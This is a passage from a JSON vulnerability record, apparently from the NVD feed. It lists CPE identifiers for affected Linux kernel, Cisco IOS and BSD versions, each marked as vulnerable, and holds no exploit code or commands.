                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.48:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.65:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13.4\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)za2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ey:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)s3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2pi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(7\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(9.4\\)da:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.45:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ey:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)jk1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)t11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5a\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(4\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3jec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:4.1.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.42:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3\\(16\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8\\)p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(13\\)ca:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0ev:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc9a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(24.2\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\)eb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)ea1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc5a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)sz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(24\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)dc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1eu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xe2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ea1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)e3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8a\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(26\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yd6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3a\\)e7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\)e3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)ew3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xh3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)mx1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxd1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17d\\)sxb7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17\\)a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sw4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(3d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sv2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(27\\)sbc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2dd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2mx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sxb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3\\(3.4\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(15\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(16\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2\\)xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(12a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(27\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ec2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(15\\)bc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yo:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7.7\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)t7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)t3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5a\\)b5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(3e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.48:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yb4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ax:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ga:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ewa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(24\\)sv1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2.2\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xm2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2da:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:1.1.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsd:bsd:4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2mb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
